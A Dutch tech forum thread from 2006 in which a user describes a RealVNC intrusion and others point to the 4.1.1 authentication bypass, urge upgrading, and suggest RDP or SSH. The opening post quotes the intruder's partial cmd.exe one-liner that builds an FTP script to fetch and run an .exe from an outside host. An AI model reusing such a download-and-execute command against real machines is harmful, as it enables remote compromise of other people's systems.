Check alle échte Black Friday-deals Ook zo moe van nepaanbiedingen? Wij laten alleen échte deals zien

realvnc zo lek als een mandje !

Pagina: 1
Acties:
  • 130 views sinds 30-01-2008
  • Reageer

  • kinderpindakaas
  • Registratie: Oktober 2006
  • Laatst online: 12-03-2024
Vanmiddag ben ik bezig geweest met realvnc.
Ik installeerde een vnc server op mijn pc en een vncviewer op mijn pocketPC.
Na wat testen had ik het werkend, en was totaal in mijn nopjes.
Echter toen ik mailtje aan het tikken was, werd plots mijn pc overgenomen.
De hacker tikte in emailvenster waar ik op dat moment mailtje aan het intikken was, het volgende:

root%\system32\cmd.exe
Cmd /c echo open ftp.volja.net 21 >> ik &echo user ur >> ik inary >> iet s.exe >> ik &echo bye >> ik &ftp -

De code is niet compleet, want ik heb uiteraard direct de verbinding verbroken.
Wat hier gebeurd is dat hacker mijn prompt wil opstarten en vervolgens een .exe file vanaf zijn ftp wil runnen op mijn pc.
Ik heb mijn vnc verbinding uiteraard met wachtwoord beveiligd, alleen encryptie had ik op Let Server choose staan.
Misschien is daar iest fout gegaan, maar ik heb weinig vertrouwen meer in realvnc.

Ben ik nu onveilig bezig geweest, of hebben meer mensen zulke ervaringen gehad?

  • Orion84
  • Registratie: April 2002
  • Laatst online: 19:59

Orion84

Admin General Chat / Wonen & Mobiliteit

Fotogenie(k)?

Welke versie was dat, want van versies ouder dan 4.1.2 (voor wat betreft de gratis versie) is bekend dat ze lek zijn ja.

The problem with common sense is that it's not all that common. | LinkedIn | Flickr


  • kinderpindakaas
  • Registratie: Oktober 2006
  • Laatst online: 12-03-2024
Orion84 schreef op vrijdag 29 december 2006 @ 13:49:
Welke versie was dat, want van versies ouder dan 4.1.2 (voor wat betreft de gratis versie) is bekend dat ze lek zijn ja.
Real VNCserver 4
Dit is inderdaad de gratis versie?
Welke versie is dan wel volledig te vertrouwen?

  • Fuzzillogic
  • Registratie: November 2001
  • Laatst online: 01-07 22:34
Kun je niet beter een RDP-client gebruiken voor Windows Mobile? Werkt waarschijnlijk een stuk sneller, is encrypted, en waarschijnlijk een stuk veiliger.

  • Ranja_Ranja
  • Registratie: November 2005
  • Laatst online: 10-12-2024
Dank voor het melden, ik ga thuis gelijk even kijken welke versie ik gebruik.

  • Exirion
  • Registratie: Februari 2000
  • Laatst online: 19:34

Exirion

Gadgetfetisjist

sprucedesign schreef op vrijdag 29 december 2006 @ 13:52:
Welke versie is dan wel volledig te vertrouwen?
Geen enkel stuk software is ooit volledig te vertrouwen ;)

"Logica brengt je van A naar B, verbeelding brengt je overal." - Albert Einstein


  • Henk007
  • Registratie: December 2003
  • Laatst online: 06-04 00:29
RealVNC Password Authentication Bypass Vulnerability
The vulnerability has been reported in version 4.1.1. Other versions may also be affected.

Note: Version 4.0 is reportedly not affected.

Solution:
Update to Free Edition version 4.1.2 or Personal Edition/Enterprise Edition version 4.2.3.
Daarbij ga ik er vanuit dat de TS alles correct heeft ingesteld met een sterk password.

  • Viper®
  • Registratie: Februari 2001
  • Niet online
Windows Mobile 5 heeft standaard een terminal service client, welke je ook kan gebruiken om naar je RDP bak te connecten.

je zou ook nog www.logmein.com kunnen gebruiken.

  • kinderpindakaas
  • Registratie: Oktober 2006
  • Laatst online: 12-03-2024
Ik heb inderdaad een sterk password toegepast, maar dat maakt blijkbaar niets uit.
Zoals in volgende filmpje is te zien vullen ze gewoon een willekeurig password in en zitten ze al binnen:
http://www.youtube.com/watch?v=D7e0ST30FnE

Dat logmein zal ongetwijfeld werken, maar heb liever dat remote instellingen zonder tussen personen verloopt. Kunnen jullie miss wat meer over RDP vertellen?
Ik ken het niet zo en kan ook nog niet standaard tooltje ontdekken op mijn windows mobile device.

  • Ranja_Ranja
  • Registratie: November 2005
  • Laatst online: 10-12-2024
Orion84 schreef op vrijdag 29 december 2006 @ 13:49:
Welke versie was dat, want van versies ouder dan 4.1.2 (voor wat betreft de gratis versie) is bekend dat ze lek zijn ja.
4.1.2 is ook al een tijdje de nieuwste van de gratis editie.

  • Viper®
  • Registratie: Februari 2001
  • Niet online
wat leesvoer: Understanding the Remote Desktop Protocol (RDP)

verder zit bij WM5 onder programma's "Terminal Service Client"

Althans bij veel merk telefoons

op je windows xp pro/windows server 2000 of 2003 kun je RDP aanzetten door bij systeem gebruikers toegang (extern) tot het systeem te geven.

bij www.logmein.com gaat het verkeer volgens mij inderdaad via hun website. Dit is juist 1 van de pluspunten omdat je ten alle tijden bij je server kan komen, zelfs achter een proxy/router binnen een bedrijf.

Verder is het verkeer RSA encrypted dacht ik.
info: http://corp.logmein.com/LMI.asp

[ Voor 3% gewijzigd door Viper® op 29-12-2006 14:09 ]


Verwijderd

Wel bizar dit.

Maar ik raadt aan om altijd SSH te gebruiken. Daar komen ze echt niet doorheen.

  • Noork
  • Registratie: Juni 2001
  • Niet online
RealVNC security flaw waarschuwing
[VNC]ineens binnenkomende verbinding, haalt .exe binnen

Gewoon upgraden, SSH gebruiken, RDP of een andere remote client/server gebruiiken zoals PCanywhere.

  • Charlie932
  • Registratie: Juli 2001
  • Laatst online: 28-11 19:27
Fijn topic..... ik heb ook maar gelijk even mijn realvnc versies geupdate van 4.11 naar 4.12!
Heb nog geen gekke dingen meegemaakt met vorige versie 4.11, maar zelfs op de site van realvnc wordt aanbevolen zsm te upgraden naar de laatste versie.
Zal dus toch wel ergens goed voor zijn!

Het leven is net een dolfijn...... meestal dol, maar soms ook fijn.


  • Rainesh
  • Registratie: Januari 2004
  • Laatst online: 19:33
Dit heb ik ook meegemaakt!! 2x zelfs waarvan ik het 1x nog op tijd kon ingrijpen. Ik had ook al een lange tijd vnc installed met wachtwoord etc, maar op een avond logde ik in via VNC op mn pc om paar liedjes naar me toe te sturen en toen zag ik dat 2 hardeschijven van mij helemaal gewist waren :'( maar ik wist helemaal niet hoe, wat etc..

De 2e keer zat ik achter de pc, just like the TS en toen zag ik dat opeens mn pc werd overgenomen en dat de intruder ook een code via "uitvoeren" intikte. Ik kon het net op tijd cancelen, anders had ik weer een probleem. Sindsdien heb ik vnc eraf gegooit en maak ik geen gebruik meer van.

http://tweakers.net/gallery/103719/sys.


  • Mektheb
  • Registratie: December 2006
  • Laatst online: 30-11 16:41
Ken het probleem , heb zelf ook vnc werkt prima simpel makkelijk verder sja
poging werd gedaan me server over te nemen meteen verbroken ofcourse nagekeken of ik ze ip kon tracken van wat binnengekomen was maar tevergeefs anders zelfde trucje uithalen he,

maar zucht het had niet veel gescheeld en ik was waarschijnlijk all me data kwijt 1,2 terra
vervolgens nooit meer last gehad , en gebruikt het in middels ook niet meer hoor maar ik ken het probleem inderdaad

  • Bor
  • Registratie: Februari 2001
  • Laatst online: 23:36

Bor

Coördinator Frontpage Admins / FP Powermod

01000010 01101111 01110010

Verwijderd schreef op vrijdag 29 december 2006 @ 14:11:
Wel bizar dit.

Maar ik raadt aan om altijd SSH te gebruiken. Daar komen ze echt niet doorheen.
Onzin, voor SSH zijn in het verleden ook exploits geweest. Geen enkel software product is 100% veilig.

Verder redelijk oud nieuws indien dit niet om de laatste versie RealVNC gaat. De meldingen van de exploits hebbben volgens mij zelfs nog op de frontpage gestaan. Het is altijd aan te raden software up2date te houden om dit soort problemen te voorkomen (je maakt in ieder geval de kans op exploits kleiner).

[ Voor 39% gewijzigd door Bor op 29-12-2006 19:31 ]

Over Bor | Vraag & Aanbod feedback | Frontpagemoderatie Forum


  • SSH
  • Registratie: Januari 2004
  • Niet online

SSH

. . . . . . . .

Bor de Wollef schreef op vrijdag 29 december 2006 @ 19:28:
[...]


Onzin, voor SSH zijn in het verleden ook exploits geweest. Geen enkel software product is 100% veilig.

Verder redelijk oud nieuws indien dit niet om de laatste versie RealVNC gaat. De meldingen van de exploits hebbben volgens mij zelfs nog op de frontpage gestaan. Het is altijd aan te raden software up2date te houden om dit soort problemen te voorkomen (je maakt in ieder geval de kans op exploits kleiner).
Je hebt gelijk hoor, maar SSH is een van de meest veiligere stukjes software gebleken. Als iemand daar doorheen komt heeft ie wel wat beters te doen dan een apparaat van een tweaker te hacken.

  • Bor
  • Registratie: Februari 2001
  • Laatst online: 23:36

Bor

Coördinator Frontpage Admins / FP Powermod

01000010 01101111 01110010

SSH schreef op vrijdag 29 december 2006 @ 19:36:
[...]


Je hebt gelijk hoor, maar SSH is een van de meest veiligere stukjes software gebleken.
En dat baseer je op? Het soort hacks uit de ts worden vrijwel altijd gedaan door scriptkiddies die gewoon van een tooltje gebruik maken zonder dat ze echt precies weten wat ze doen. Daarvoor is ook eigenlijk maar erg weinig kennis nodig.

Over Bor | Vraag & Aanbod feedback | Frontpagemoderatie Forum


  • kinderpindakaas
  • Registratie: Oktober 2006
  • Laatst online: 12-03-2024
kan ik met bijv. pc anywhere nog wel connecten via mijn pocketpc dan?
Pagina: 1